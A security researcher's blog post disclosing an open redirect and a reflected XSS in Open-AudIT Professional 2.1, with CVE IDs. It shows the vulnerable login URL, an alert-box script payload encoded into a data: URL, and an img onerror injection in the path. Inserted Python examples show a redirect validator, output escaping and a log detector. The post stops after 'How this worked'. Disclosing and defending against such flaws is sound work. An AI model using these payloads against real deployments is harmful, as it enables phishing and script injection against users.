Open Redirect to Reflected XSS - Open-AuditIT Professional 2.1

Hi All,

Recently, during one of my pentest research efforts, I found an Open-AuditIT Professional 2.1 installation.

Open-AudIT is a network auditing application. It is built on the scripting languages PHP, Bash and VBScript. Open-AudIT can tell you what is on your network, how it is configured and whether anything has changed.

Curious to explore its functionality, I downloaded it and set it up on my local system.

After installing it, the first thing I noticed was the `redirect_url=` parameter.

For me, getting an open URL redirect is my cup of tea.

  • Title of the Vulnerability: Open URL Redirect and Reflected Cross-site Scripting (XSS)
  • Vulnerability Class: Security Misconfiguration and Cross-site Scripting (XSS)
  • Technical Details & Description: The application accepts untrusted input and uses it as a redirect target, so a request can be redirected to a URL contained within that untrusted input. By modifying the URL input to point at a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
  • CVE IDs allocated:
  1. Open Redirect: CVE-2018-8937
  2. Reflected XSS: CVE-2018-8978
  • Product & Service Introduction: Open-AuditIT Professional 2.1

POC :- 



Vulnerable URL :- 
http://localhost/omk/open-audit/login?redirect_url=http://www.nileshsapariya.blogspot.com
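As an added example (not part of the original post and not Open-AudIT's own code), here is how a login handler should treat a `redirect_url` parameter so that it can only send the user to a same-origin path. `DEFAULT_TARGET` and the two handler functions are assumptions for illustration; the URL-encoded `data:` value is the one shown later in this post, reused here only as a test input. The validator decodes repeatedly before judging the value, so percent-encoded variants of absolute or protocol-relative URLs are rejected as well.

```python
from typing import Optional
from urllib.parse import unquote, urlsplit

# Assumed landing page to fall back to; not taken from Open-AudIT.
DEFAULT_TARGET = "/omk/open-audit/"

# The URL-encoded data: URL from the post, used here only as a test input.
ENCODED_DATA_URL = ("%64%61%74%61%3a%74%65%78%74%2f%68%74%6d%6c%3b%62%61%73%65%36%34%2c"
                    "%50%48%4e%6a%63%6d%6c%77%64%44%35%68%62%47%56%79%64%43%67%6e%51%6b"
                    "%39%50%54%53%63%70%50%43%39%7a%59%33%4a%70%63%48%51%2b")


def unsafe_redirect_target(redirect_url: str) -> str:
    """The pattern the post describes: the parameter is trusted verbatim
    (constructed illustration of the bug class, not the vendor's code)."""
    return redirect_url


def _decode_repeatedly(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value is stable (bounded), so encoded variants
    such as %2F%2Fevil.example are judged on their decoded form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_redirect_target(redirect_url: Optional[str]) -> str:
    """Return a same-origin path to redirect to after login, or DEFAULT_TARGET.

    Rejects anything a browser could treat as leaving the site: absolute URLs
    (http://..., data:...), protocol-relative URLs (//host and /\\host), and
    values containing control characters.
    """
    if not redirect_url:
        return DEFAULT_TARGET
    candidate = _decode_repeatedly(redirect_url).strip()
    # Control characters have no place in a Location target.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in candidate):
        return DEFAULT_TARGET
    # Exactly one leading slash: "//host" and "/\host" are protocol-relative.
    if not candidate.startswith("/") or candidate[1:2] in ("/", "\\"):
        return DEFAULT_TARGET
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        return DEFAULT_TARGET
    return candidate


if __name__ == "__main__":
    for value in ("http://www.nileshsapariya.blogspot.com", "//evil.example",
                  "%2F%2Fevil.example", ENCODED_DATA_URL,
                  "/omk/open-audit/devices?page=2"):
        print(repr(value[:40]), "->", safe_redirect_target(value))
```

Only the last of the values in the demo survives validation; every other one falls back to the default landing page instead of being placed in the `Location` header.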




Let's move ahead one more step.

Now, in most cases, when you find an open URL redirection, the chance of also having XSS is almost 99%.

1st try for reflected XSS

1] Payload:
<script>alert('BOOM')</script>

Base64 encode:
PHNjcmlwdD5hbGVydCgnQk9PTScpPC9zY3JpcHQ+

2] Wrap it in a data: URL:
data:text/html;base64,PHNjcmlwdD5hbGVydCgnQk9PTScpPC9zY3JpcHQ+

3] URL encode:
%64%61%74%61%3a%74%65%78%74%2f%68%74%6d%6c%3b%62%61%73%65%36%34%2c%50%48%4e%6a%63%6d%6c%77%64%44%35%68%62%47%56%79%64%43%67%6e%51%6b%39%50%54%53%63%70%50%43%39%7a%59%33%4a%70%63%48%51%2b






But hey, this is not XSS.

2nd try for reflected XSS

XSS via a crafted src attribute of an IMG element within a URI.


Vulnerable URL :-
http://localhost/omk/open-audit/y3ipe%3cimg%20src%3da%20onerror%3dalert('hacked')%3ek87ss
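As an added example (not from the original post and not Open-AudIT's code), the block below shows the two sides of this finding from a defender's view: the rendering bug class, where a decoded request path is echoed into HTML unencoded, next to the fixed version that encodes for an HTML text context, and a small access-log check that decodes request targets and flags markup-like syntax in them. The rendering functions, the log format and the sample log lines are constructed for illustration; the request path itself is the one from the vulnerable URL above.

```python
import html
import re
from urllib.parse import unquote

# Request path taken from the post's vulnerable URL.
REFLECTED_PATH = "/omk/open-audit/y3ipe%3cimg%20src%3da%20onerror%3dalert('hacked')%3ek87ss"


def render_not_found_unsafe(path: str) -> str:
    """Constructed illustration of the bug class: the decoded request path is
    echoed into HTML unencoded, so markup in the path becomes markup in the page."""
    return "<p>Page not found: " + unquote(path) + "</p>"


def render_not_found_safe(path: str) -> str:
    """Same response, but the reflected value is encoded for an HTML text
    context, so '<', '>', quotes and '&' arrive as entities."""
    return "<p>Page not found: " + html.escape(unquote(path), quote=True) + "</p>"


# Detection side: pull the request target out of a combined-format access-log
# line, decode it, and flag HTML tag or event-handler syntax. Heuristic only;
# legitimate parameters that happen to start with "on" will also be flagged.
LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r"<\s*/?[a-z][a-z0-9]*|\bon[a-z]+\s*=", re.IGNORECASE)


def flag_reflected_markup(log_lines):
    """Return the decoded request targets that contain markup-like syntax."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        # Two decoding rounds so a double-encoded target is still seen decoded.
        target = unquote(unquote(m.group("target")))
        if MARKUP_RE.search(target):
            hits.append(target)
    return hits


# Constructed sample log lines (not from any real deployment).
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Mar/2018:12:00:01 +0000] "GET /omk/open-audit/login?redirect_url=/omk/open-audit/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [10/Mar/2018:12:00:05 +0000] "GET ' + REFLECTED_PATH + ' HTTP/1.1" 404 512 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [10/Mar/2018:12:00:09 +0000] "GET /omk/open-audit/devices?page=2 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    print("unsafe:", render_not_found_unsafe(REFLECTED_PATH))
    print("safe:  ", render_not_found_safe(REFLECTED_PATH))
    for hit in flag_reflected_markup(SAMPLE_LOG):
        print("flagged:", hit)
```

Of the three constructed log lines only the second is flagged; the safe renderer turns the `<img ...>` in the path into `&lt;img ...&gt;`, which the browser displays as text rather than parsing as an element.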

Video POC for Reflected XSS




How this worked :-